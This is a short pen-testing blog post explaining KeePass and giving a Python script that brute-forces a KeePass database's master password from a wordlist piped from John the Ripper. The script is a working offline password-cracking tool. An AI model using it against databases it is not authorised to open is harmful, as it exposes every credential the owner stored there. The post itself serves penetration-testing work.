Brute-forcing Keepass password key-chains
From the website:
KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).
This open source password manager is available on Window, Mac, Linux, Android and iPhone. Hence, chances are that we will find one of these keychain files during a pen-test.
Looking for ways to brute-force the password I stumbled across with this python implementation that is able to read the file and dump its contents. It should not be very inefficient since it is using pycrypto, that is implemented in C.
The code is fairly simple and expects the list of passwords in the standard input. One possibility is to use John the Ripper for this task :)
You can find the code below.
#! /usr/env/python
#https://github.com/brettviren/python-keepass
# reads a list of pass words from the standard input
# john the ripper may be used to feed the application
from keepass import kpdb
import sys
import fileinput
for line in sys.stdin:
passwd=line.strip("\n")
try:
db = kpdb.Database(sys.argv[1],passwd)
print "Valid password found for %s : %s" % (sys.argv[1],passwd)
sys.exit(0)
except ValueError:
pass